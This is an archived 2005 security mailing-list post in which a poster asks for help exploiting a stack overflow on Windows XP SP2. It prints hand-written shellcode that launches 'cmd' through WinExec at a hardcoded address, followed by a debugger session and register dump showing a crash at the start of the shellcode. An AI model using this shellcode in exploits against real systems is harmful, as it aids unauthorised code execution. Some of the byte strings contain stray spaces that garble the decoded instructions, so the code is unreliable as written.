|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
problem to exploit a stack overflow
From: migalo digalo (l.epsilon
gmail.com)
Date: Tue May 24 2005 - 09:09:56 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
hi all,
ok i tested many test with shell that have not 0xcc and 0xc9 ... i
dicided to test it with my own shellcode (a very simple one)
unsigned char shellcode[] =
"\xC6\x45\xFC\x63" /* mov byte ptr [ebp-4],63h*/
"\xC6\x45\xFD\x6D" /* mov byte ptr [ebp-3],6Dh*/
"\xC6\x45\xFE\x64" /*mov byte ptr [ebp-2],64h*/
"\x33\xC0" /*xor eax,eax*/
"\x50" /*push eax*/
"\x6A\x01 " /*push 1*/
"\x8D\x45\xFC " /*lea eax,[ebp-4]*/
"\x50" /*push eax*/
"\xB8\x4D\x11\x86\x7C" /*mov eax,0x7c86114d (winexec)*/
"\xFF\xD0" /*call eax*/
"\x6A\x01" /*push 1*/
"\xB8\xA2\xCA\x81\x7C" /*mov eax,0x7c81caa2(ExitProcess)*/
"\xFF\xD0"; /*call eax*/
and a degug session give me that:
0012FF34 C6 45 FC 63 mov byte ptr [ebp-4],63h
0012FF38 C6 45 FD 6D mov byte ptr [ebp-3],6Dh
0012FF3C C6 45 FE 64 mov byte ptr [ebp-2],64h
0012FF40 33 C0 xor eax,eax
0012FF42 50 push eax
0012FF43 6A 01 push 1
0012FF45 20 8D 45 FC 20 50 and byte ptr [ebp+5020FC45h],cl
0012FF4B B8 4D 11 86 7C mov eax,7C86114Dh
0012FF50 FF D0 call eax
0012FF52 6A 01 push 1
0012FF54 B8 A2 CA 81 7C mov eax,7C81CAA2h
0012FF59 FF D0 call eax
0012FF5B 90 nop
EAX = 00000001 EBX = 7FFD9000 ECX = 00423AA8
EDX = 00000000 ESI = 00000000 EDI = 0012FF80
EIP = 0012FF34 ESP = 0012FF34 EBP = 90909090
EFL = 00000246 CS = 001B DS = 0023 ES = 0023
SS = 0023 FS = 003B GS = 0000 OV=0 UP=0 EI=1 PL=0
ZR=1 AC=0 PE=1 CY=0
9090908C = ??
ST0 = +0.00000000000000000e+0000
ST1 = +0.00000000000000000e+0000
ST2 = +0.00000000000000000e+0000
ST3 = +0.00000000000000000e+0000
ST4 = +0.00000000000000000e+0000
ST5 = +0.00000000000000000e+0000
ST6 = +0.00000000000000000e+0000
ST7 = +0.00000000000000000e+0000 CTRL = 027F
STAT = 0000 TAGS = FFFF EIP = 00000000 CS = 0000
DS = 0000 EDO = 00000000
so the access violation happend (this time) in the beging of the
shellcode !!!? is that a security future in xp sp2 ? or samething
else? can sameone help me to understand this .
thank you
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]